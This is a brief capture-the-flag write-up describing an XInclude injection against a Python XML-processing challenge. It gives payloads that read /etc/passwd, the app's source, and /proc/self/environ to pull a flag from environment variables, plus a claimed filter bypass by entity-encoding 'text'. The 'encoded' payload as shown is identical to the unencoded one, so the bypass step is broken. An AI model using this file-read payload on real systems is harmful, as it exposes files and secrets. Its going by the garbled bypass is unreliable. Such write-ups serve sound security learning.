Rating: 5.0
The challenge provide the source code. We check code and found something interesting.
Line `ElementInclude.include(root)` and xml should not contain "text". Therefor we try using Xinclude to read file "app.py". The payload is:
```
<document xmlns:xi="http://www.w3.org/2001/XInclude">
<attribute>
Copyright (c) <xi:include href="/etc/passwd" parse="text"/>.
</attribute>
</document>
```
To bypass `if "text" not in xml.lower()`, we use HTML entity to encode "text" string. Replace "text" with `text`, we have:
```
<document xmlns:xi="http://www.w3.org/2001/XInclude">
<attribute>
Copyright (c) <xi:include href="/etc/passwd" parse="text"/>.
</attribute>
</document>
```
Submit payload and we can read file.
-----
Change "/etc/passwd" to "app.py" and know the flag is in environment variable.
-----
To have a flag we must read file "/proc/self/environ", modify the payload a bit, and...
good job
